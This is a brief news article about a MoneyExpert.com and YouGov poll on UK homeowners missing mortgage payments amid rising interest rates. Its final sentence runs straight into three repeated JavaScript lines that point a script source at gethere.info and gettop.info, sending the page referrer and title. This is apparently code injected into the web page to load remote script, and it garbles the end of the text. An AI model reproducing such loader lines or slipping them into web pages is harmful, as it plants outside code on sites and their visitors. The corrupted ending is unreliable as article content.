Missed mortgage payments add pressure to homeowners

houseline131.jpgOver half a million homeowners have missed a mortgage repayment in the past six months, a poll by price comparison site MoneyExpert.com has suggested.

The poll, in conjunction with YouGov found 463,000 people have missed a mortgage payment since July 2007 – almost 4% of the 11.8 million outstanding mortgages in the country.

Sean Gardner, chief executive of MoneyExpert.com said: “Missing a mortgage payment doesn’t incur an automatic charge like failing to pay your credit card bill, but it is a sign of real distress, as keeping a roof over your head should be the priority for most of us.

“It’s clear that many homeowners are feeling the strain of successive interest rate hikes.”

YouGov polled 2,082 adults in the survey.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
